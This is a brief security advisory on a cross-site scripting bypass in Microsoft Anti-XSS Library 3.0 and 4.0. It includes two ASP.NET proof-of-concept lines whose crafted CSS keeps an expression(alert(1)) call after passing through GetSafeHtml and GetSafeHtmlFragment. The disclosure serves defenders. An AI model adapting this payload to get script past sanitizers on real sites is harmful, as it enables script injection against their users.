Microsoft Anti-XSS Library is used to protect applications from Cross-Site Scripting attacks, by providing methods for input sanitization.
Microsoft Anti-XSS Library 3.0 and 4.0 are vulnerable to an attack in which an attacker is able to create a specially formed CSS, that after passing through the GetSafeHTML or GetSafeHTMLFragment methods, contains an expression that triggers a JavaScript call in Internet Explorer.
The following ASP.NET code demonstrates the vulnerability:
1. string data = Microsoft.Security.Application.Sanitizer.GetSafeHtml("<html>a<style><!--div{font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'}--></style><div>b</div></html>");
2. string data = Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment("<div style=\"font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'\">aaa</div>");
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